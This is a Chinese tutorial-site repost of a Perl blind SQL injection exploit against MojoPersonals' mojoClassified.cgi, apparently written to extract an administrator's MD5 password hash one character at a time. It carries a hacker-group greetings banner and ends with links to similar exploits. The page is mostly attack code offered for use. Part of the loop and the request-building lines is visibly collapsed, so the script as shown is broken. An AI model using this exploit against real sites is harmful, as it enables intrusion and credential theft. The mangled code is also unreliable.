手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit
MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit
摘要:#!/usr/bin/perluseLWP::UserAgent;useGetopt::Long;if(!$ARGV[1]){print"n...

#!/usr/bin/perl

use LWP::UserAgent;

use Getopt::Long;

if(!$ARGV[1])

{

print " n";

print " #################### Viva IslaMe Viva IslaMe ################n";

print " # MojoPersonals Blind SQL Injection Exploit #n";

print " # (mojoClassified.cgi mojo ) #n";

print " # Author: Mr.SQL #n";

print " # EMAIL : SQL@HOTMAIL.IT #n";

print " # #n";

print " # -((:: GrE3E3E3E3E3ETZ ::))- #n";

print " # #n";

print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #n";

print " # :: ALwHeD :: milw0rm :: #n";

print " # #n";

print " # MuSliMs HaCkErS #n";

print " # #n";

print " # HOME: WwW.PaL- #n";

print " # #n";

print " # Usage : perl test.pl host #n";

print " # Example: perl test.pl / -d 10 #n";

print " # Options: #n";

print " # -d valid cat value #n";

print " #############################################################n";

exit;

}

my $host = $ARGV[0];

my $cat = $ARGV[2];

my %options = ();

GetOptions(%options, "u=i", "p=s", "d=i");

print "[~] Exploiting...n";

if($options{"b"})

{

$mojo = $options{"b"};

}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i get($query);

my $content = $resp->content;

my $regexp = "tourterms.pdf";

if($content =~ /$regexp/)

{

return 1;

}

else

{

return 0;

}

}

【MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit】相关文章:

新浪微博安全手机注销了怎么办?

网管教你预防黑客DdoS攻击的技巧

IntelliTamper 2.07 (map file) Local Arbitrary Code Execution Exploit (pl)

文件关联型木马的特殊化查杀教程

MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit

Win8安全模式开启方法

e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit

用金山卫士清理注册表垃圾方法

WinRemotePC Full Lite 2008 r.2server Denial of Service Exploit

webshell低权限重启服务器的另类方法

精品推荐
分类导航